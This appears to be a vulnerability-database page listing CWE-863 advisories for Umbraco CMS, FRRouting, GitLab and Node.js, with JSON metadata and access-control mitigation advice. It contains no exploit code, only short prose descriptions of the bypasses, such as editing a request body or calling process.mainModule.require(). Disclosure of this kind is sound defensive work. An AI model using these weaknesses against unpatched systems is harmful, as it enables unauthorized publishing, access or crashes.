Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Umbraco.CMS"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "8.0.0"
            },
            {
              "fixed": "8.18.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Umbraco.CMS"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "9.0.0"
            },
            {
              "fixed": "10.8.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Umbraco.CMS"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "11.0.0"
            },
            {
              "fixed": "12.3.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-48227"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-12-13T13:21:51Z",
    "nvd_published_at": "2023-12-12T17:15:08Z",
    "severity": "LOW"
  },
  "details": "#### Impact\nBackoffice users with send for approval permission but not publish permission are able to publish in some scenarios.\n\n#### Explanation of the vulnerability \nBackoffice users without permission to publish content, but only to send for approval, can bypass the restriction by modifying the request body of the \"Send for Approval\" request.",
  "id": "GHSA-335x-5wcm-8jv2",
  "modified": "2024-01-12T16:28:24Z",
  "published": "2023-12-13T13:21:51Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/umbraco/Umbraco-CMS/security/advisories/GHSA-335x-5wcm-8jv2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-48227"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/umbraco/Umbraco-CMS"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Backoffice User can bypass \"Publish\" restriction"
}

GHSA-33FQ-CJ88-4V27

Vulnerability from github – Published: 2023-10-26 06:30 – Updated: 2025-11-04 18:30
VLAI
Details

An issue was discovered in FRRouting FRR through 9.0.1. A crash can occur for a crafted BGP UPDATE message without mandatory attributes, e.g., one with only an unknown transit attribute.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-46753"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-10-26T05:15:26Z",
    "severity": "HIGH"
  },
  "details": "An issue was discovered in FRRouting FRR through 9.0.1. A crash can occur for a crafted BGP UPDATE message without mandatory attributes, e.g., one with only an unknown transit attribute.",
  "id": "GHSA-33fq-cj88-4v27",
  "modified": "2025-11-04T18:30:44Z",
  "published": "2023-10-26T06:30:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46753"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FRRouting/frr/pull/14645/commits/d8482bf011cb2b173e85b65b4bf3d5061250cdb9"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00019.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00007.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-33J6-GQW4-WVVG

Vulnerability from github – Published: 2023-12-01 09:30 – Updated: 2023-12-01 09:30
VLAI
Details

An issue has been discovered in GitLab affecting all versions starting from 9.2 before 16.4.3, all versions starting from 16.5 before 16.5.3, all versions starting from 16.6 before 16.6.1. It was possible for a user with the Developer role to update a pipeline schedule from an unprotected branch to a protected branch.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-4317"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284",
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-12-01T07:15:10Z",
    "severity": "MODERATE"
  },
  "details": "An issue has been discovered in GitLab affecting all versions starting from 9.2 before 16.4.3, all versions starting from 16.5 before 16.5.3, all versions starting from 16.6 before 16.6.1. It was possible for a user with the Developer role to update a pipeline schedule from an unprotected branch to a protected branch.",
  "id": "GHSA-33j6-gqw4-wvvg",
  "modified": "2023-12-01T09:30:43Z",
  "published": "2023-12-01T09:30:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4317"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/2089517"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/421846"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-33P5-M25C-CP6W

Vulnerability from github – Published: 2023-02-23 21:30 – Updated: 2025-03-12 18:32
VLAI
Details

A privilege escalation vulnerability exists in Node.js <19.6.1, <18.14.1, <16.19.1 and <14.21.3 that made it possible to bypass the experimental Permissions (https://nodejs.org/api/permissions.html) feature in Node.js and access non authorized modules by using process.mainModule.require(). This only affects users who had enabled the experimental permissions option with --experimental-policy.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-23918"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-02-23T20:15:00Z",
    "severity": "HIGH"
  },
  "details": "A privilege escalation vulnerability exists in Node.js \u003c19.6.1, \u003c18.14.1, \u003c16.19.1 and \u003c14.21.3 that made it possible to bypass the experimental Permissions (https://nodejs.org/api/permissions.html) feature in Node.js and access non authorized modules by using process.mainModule.require(). This only affects users who had enabled the experimental permissions option with --experimental-policy.",
  "id": "GHSA-33p5-m25c-cp6w",
  "modified": "2025-03-12T18:32:40Z",
  "published": "2023-02-23T21:30:16Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23918"
    },
    {
      "type": "WEB",
      "url": "https://nodejs.org/en/blog/vulnerability/february-2023-security-releases"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20230316-0008"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design
  • Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.
  • Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
Mitigation
Architecture and Design

Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].

Mitigation MIT-4.4
Architecture and Design

Strategy: Libraries or Frameworks

  • Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
  • For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45].
Mitigation
Architecture and Design
  • For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.
  • One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.
Mitigation
System Configuration Installation

Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.

No CAPEC attack patterns related to this CWE.